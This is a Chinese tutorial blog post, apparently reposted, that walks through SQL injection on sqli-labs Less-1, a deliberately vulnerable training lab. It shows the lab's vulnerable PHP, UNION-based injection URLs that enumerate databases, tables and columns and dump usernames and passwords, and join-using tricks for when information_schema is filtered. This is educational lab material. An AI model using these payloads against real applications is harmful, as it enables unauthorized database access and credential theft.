目录
先浅浅的看一下第一关
他让我们输入一个id
第一次嘛看一下源代码喽
再说一下相关知识
实战
了解他的库和表
实战
列名去哪查???
利用 join-using 注列名
本文主要讲述sql-labs上面的绕过方法,我主要采用的是小皮搭建
小皮搭建环境问题:
1、用apache别用nginx 记得改一下sql-connections里的db-creds.inc是用来连接数据库的
2、记得php版本不易太高
sql中的注释-- 和 #
1,在我们进行sql注入的时候都需要将后面的代码注释掉,很多人都在使用--+其实是--
后面有一个空格经过URL code 编码的+,因为在你的注入语句后面有它本身的一个单引号
你需要将他闭合或者注释掉,可以--'也可以--+,如果使用注释必须加空格。
2,当我们使用#的时候,url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以,HTTP请求中不包括#,所以需要进行编码%23
首先我们去github上下载sql-labs的源码
GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.
先浅浅的看一下第一关
他让我们输入一个id
第一次嘛看一下源代码喽
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
看到$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";因为id是单引号闭合的那就先给他传一个单引号,看他报错
报错就说明有注入点很开心
再说一下相关知识
外带数据的时候可以用and or union
在我们查的时候要知道库名,表名,列名,数据
想要联合查询就要知道他有几列
那我们来做个实验
mysql> select * from users union select 1,2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from users union select 1,2,3;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 1 | 2 | 3 |
+----+----------+------------+
9 rows in set (0.00 sec)
mysql>很容易看出来当列不一致联合查询是不行的
再看一下
mysql> select * from users order by 1 asc;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
+----+----------+------------+
8 rows in set (0.00 sec)
mysql> select * from users order by username asc;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 8 | admin | admin |
| 2 | Angelina | I-kill-you |
| 7 | batman | mob!le |
| 1 | Dumb | Dumb |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
+----+----------+------------+
8 rows in set (0.00 sec)
mysql> select * from users order by 2 asc;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 8 | admin | admin |
| 2 | Angelina | I-kill-you |
| 7 | batman | mob!le |
| 1 | Dumb | Dumb |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
+----+----------+------------+
8 rows in set (0.00 sec)
mysql>看完你就会很明白order by 可以进行列数量的窥探
实战
查看3列
当查看到4列时
了解他的库和表
mysql> select * from users union select 1,user(),3;
+----+----------------+------------+
| id | username | password |
+----+----------------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 1 | root@localhost | 3 |
+----+----------------+------------+
9 rows in set (0.00 sec)
mysql> select * from users union select 1,database(),3;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 1 | security | 3 |
+----+----------+------------+
9 rows in set (0.00 sec)
mysql> select * from users union select 1,version(),3;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 1 | 5.7.26 | 3 |
+----+----------+------------+
9 rows in set (0.16 sec)
mysql>
看完上面你又会懂,user(),database(),version()三个系统函数,总之查查查
实战
user()
database()
version()
列名去哪查???
sys
information_schema
需要关注这两个表先看第二个
mysql> use information_schema
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS | 列
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA | 数据库名
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
| INNODB_LOCKS |
| INNODB_TRX |
| INNODB_SYS_DATAFILES |
| INNODB_FT_CONFIG |
| INNODB_SYS_VIRTUAL |
| INNODB_CMP |
| INNODB_FT_BEING_DELETED |
| INNODB_CMP_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMPMEM_RESET |
| INNODB_FT_DELETED |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_LOCK_WAITS |
| INNODB_TEMP_TABLE_INFO |
| INNODB_SYS_INDEXES |
| INNODB_SYS_TABLES |
| INNODB_SYS_FIELDS |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_BUFFER_PAGE |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_INDEX_TABLE |
| INNODB_FT_INDEX_CACHE |
| INNODB_SYS_TABLESPACES |
| INNODB_METRICS |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_CMPMEM |
| INNODB_BUFFER_POOL_STATS |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_TABLESTATS |
+---------------------------------------+
61 rows in set (0.00 sec)
mysql>接着看SCHEMATA
mysql> desc SCHEMATA;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 39
Current database: information_schema
+----------------------------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+----------------------------+--------------+------+-----+---------+-------+
| CATALOG_NAME | varchar(512) | NO | | | |
| SCHEMA_NAME | varchar(64) | NO | | | |
| DEFAULT_CHARACTER_SET_NAME | varchar(32) | NO | | | |
| DEFAULT_COLLATION_NAME | varchar(32) | NO | | | |
| SQL_PATH | varchar(512) | YES | | NULL | |
+----------------------------+--------------+------+-----+---------+-------+
5 rows in set (0.00 sec)
mysql> select SCHEMA_NAME from SCHEMATA;
+--------------------+
| SCHEMA_NAME |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| security |
| sys |
+--------------------+
5 rows in set (0.00 sec)
mysql>注意:当information_schema被过滤以后可以用sys,但是他只有库名,需要用join+using爆出表名。
查询一下
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20table_name%20from%20information_schema.tables),3%20--+
显示子查询超过1行
我试一下不用子查询
代码
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,table_name,3%20from%20information_schema.tables--+
这明显查的是第一个库的第一个表
在他后面限制一下库名,他就可以查security的库啦
代码
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=%27security%27--+
看一下数据库
可以加一个limit,探测
代码
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%201,1--+
这样太麻烦了
我么再用一下子查询
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),3%20--+
当你把表都查出来了就开始查列名啦,将table改为column 再加上一个and 限制一下表名为users
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27and%20table_name=%27users%27),3%20--+
然后你就知道了库名(security),表名(users),列名(username,password)
然后正常查就可以啦
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20username,password%20from%20users),3--+ 
但是会显示操作数列大于一行
然后咋办呢?那肯定是gruop_concat
代码
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(username,password)%20from%20users),3--+
有点奇怪,加一个连接符
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(username,0x3a,password)%20from%20users),3--+
这样就成功啦;
但是如果information被过滤了咋办,那就要请出我们的sys库啦
mysql> use sys;
Database changed
mysql> show tables;
+-----------------------------------------------+
| Tables_in_sys |
+-----------------------------------------------+
| host_summary |
| host_summary_by_file_io |
| host_summary_by_file_io_type |
| host_summary_by_stages |
| host_summary_by_statement_latency |
| host_summary_by_statement_type |
| innodb_buffer_stats_by_schema |
| innodb_buffer_stats_by_table |
| innodb_lock_waits |
| io_by_thread_by_latency |
| io_global_by_file_by_bytes |
| io_global_by_file_by_latency |
| io_global_by_wait_by_bytes |
| io_global_by_wait_by_latency |
| latest_file_io |
| memory_by_host_by_current_bytes |
| memory_by_thread_by_current_bytes |
| memory_by_user_by_current_bytes |
| memory_global_by_current_bytes |
| memory_global_total |
| metrics |
| processlist |
| ps_check_lost_instrumentation |
| schema_auto_increment_columns |
| schema_index_statistics |
| schema_object_overview |
| schema_redundant_indexes |
| schema_table_lock_waits |
| schema_table_statistics |
| schema_table_statistics_with_buffer |
| schema_tables_with_full_table_scans |
| schema_unused_indexes |
| session |
| session_ssl_status |
| statement_analysis |
| statements_with_errors_or_warnings |
| statements_with_full_table_scans |
| statements_with_runtimes_in_95th_percentile |
| statements_with_sorting |
| statements_with_temp_tables |
| sys_config |
| user_summary |
| user_summary_by_file_io |
| user_summary_by_file_io_type |
| user_summary_by_stages |
| user_summary_by_statement_latency |
| user_summary_by_statement_type |
| version |
| wait_classes_global_by_avg_latency |
| wait_classes_global_by_latency |
| waits_by_host_by_latency |
| waits_by_user_by_latency |
| waits_global_by_latency |
| x$host_summary |
| x$host_summary_by_file_io |
| x$host_summary_by_file_io_type |
| x$host_summary_by_stages |
| x$host_summary_by_statement_latency |
| x$host_summary_by_statement_type |
| x$innodb_buffer_stats_by_schema |
| x$innodb_buffer_stats_by_table |
| x$innodb_lock_waits |
| x$io_by_thread_by_latency |
| x$io_global_by_file_by_bytes |
| x$io_global_by_file_by_latency |
| x$io_global_by_wait_by_bytes |
| x$io_global_by_wait_by_latency |
| x$latest_file_io |
| x$memory_by_host_by_current_bytes |
| x$memory_by_thread_by_current_bytes |
| x$memory_by_user_by_current_bytes |
| x$memory_global_by_current_bytes |
| x$memory_global_total |
| x$processlist |
| x$ps_digest_95th_percentile_by_avg_us |
| x$ps_digest_avg_latency_distribution |
| x$ps_schema_table_statistics_io |
| x$schema_flattened_keys |
| x$schema_index_statistics |
| x$schema_table_lock_waits |
| x$schema_table_statistics |
| x$schema_table_statistics_with_buffer |
| x$schema_tables_with_full_table_scans |
| x$session |
| x$statement_analysis |
| x$statements_with_errors_or_warnings |
| x$statements_with_full_table_scans |
| x$statements_with_runtimes_in_95th_percentile |
| x$statements_with_sorting |
| x$statements_with_temp_tables |
| x$user_summary |
| x$user_summary_by_file_io |
| x$user_summary_by_file_io_type |
| x$user_summary_by_stages |
| x$user_summary_by_statement_latency |
| x$user_summary_by_statement_type |
| x$wait_classes_global_by_avg_latency |
| x$wait_classes_global_by_latency |
| x$waits_by_host_by_latency |
| x$waits_by_user_by_latency |
| x$waits_global_by_latency |
+-----------------------------------------------+
101 rows in set (0.00 sec)
mysql>我们来看一下这个自增的表 schema_auto_increment_columns
mysql> desc schema_auto_increment_columns ;
+----------------------+------------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+----------------------+------------------------+------+-----+---------+-------+
| table_schema | varchar(64) | NO | | | |
| table_name | varchar(64) | NO | | | |
| column_name | varchar(64) | NO | | | |
| data_type | varchar(64) | NO | | | |
| column_type | longtext | NO | | NULL | |
| is_signed | int(1) | NO | | 0 | |
| is_unsigned | int(1) | NO | | 0 | |
| max_value | bigint(21) unsigned | YES | | NULL | |
| auto_increment | bigint(21) unsigned | YES | | NULL | |
| auto_increment_ratio | decimal(25,4) unsigned | YES | | NULL | |
+----------------------+------------------------+------+-----+---------+-------+
10 rows in set (0.00 sec)
试图查一下列名
mysql> select column_name from schema_auto_increment_columns where table_schema='security' and table_name = 'users';
+-------------+
| column_name |
+-------------+
| id |
+-------------+
1 row in set (0.01 sec)
mysql>好像只能查出一列来;
加了group_concat也不行
mysql> select group_concat(column_name) from schema_auto_increment_columns where table_schema='security' and table_name = 'users';
+---------------------------+
| group_concat(column_name) |
+---------------------------+
| id |
+---------------------------+
1 row in set (0.01 sec)
mysql>那么这个sys就查不出来列名啦,办法总是有的就是比较难,就是无列名注入。
利用 join-using 注列名
代码
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b)%20as%20c%20--+这个代码的意思就是将users表当作a 在用join把users表当作b,将a,b合起来当作c来查询,这样查询就会将重复的列名爆出来。
然后使用using加列名一个一个的进行突破
20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b%20using(id))%20as%20c%20--+
知道最后就全部突破文章来源:https://www.toymoban.com/news/detail-407977.html
http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b%20using(id,username,password))%20as%20c%20--+
文章来源地址https://www.toymoban.com/news/detail-407977.html
反引号中的数字代表几列
mysql> use security ;
Database changed
mysql> select `3` from (select 1,2,3 union select*from users) as a;
+------------+
| 3 |
+------------+
| 3 |
| Dumb |
| I-kill-you |
| p@ssword |
| crappy |
| stupidity |
| genious |
| mob!le |
| admin |
+------------+
9 rows in set (0.00 sec)
mysql>到了这里,关于SQL注入难不难的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
